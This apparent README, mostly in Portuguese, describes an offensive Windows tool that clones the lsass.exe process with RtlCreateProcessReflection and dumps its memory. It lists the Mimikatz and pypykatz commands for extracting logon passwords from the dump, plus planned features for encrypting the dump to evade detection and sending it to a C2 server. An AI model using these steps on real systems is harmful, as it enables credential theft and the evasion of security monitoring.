
Esta ferramenta emprega a técnica de Process Forking usando a API RtlCreateProcessReflection para clonar o processo lsass.exe. Uma vez criado o clone, ela utiliza callbacks MINIDUMP_CALLBACK_INFORMATION para gerar um dump de memória do processo clonado.
Esta ferramenta utiliza a técnica de Process Forking usando a API RtlCreateProcessReflection para clonar o processo lsass.exe. Uma vez criado o clone, ela utiliza callbacks MINIDUMP_CALLBACK_INFORMATION para gerar um despejo de memória do processo clonado.
Basta executar o arquivo compilado.
ReflectDump.exe
Use o Mimikatz ou Pypykatz para analisar o arquivo de dump offline.
sekurlsa::minidump [filename] sekurlsa::logonpasswords
pypykatz lsa minidump [filename]
* Encrypt dump before writing on disk to bypass static detection.
* Exfiltrate on C2 Server
O conteúdo fornecido neste repositório é apenas para fins educacionais e informativos.
https://www.deepinstinct.com/blog/dirty-vanity-a-new-approach-to-code-injection-edr-bypass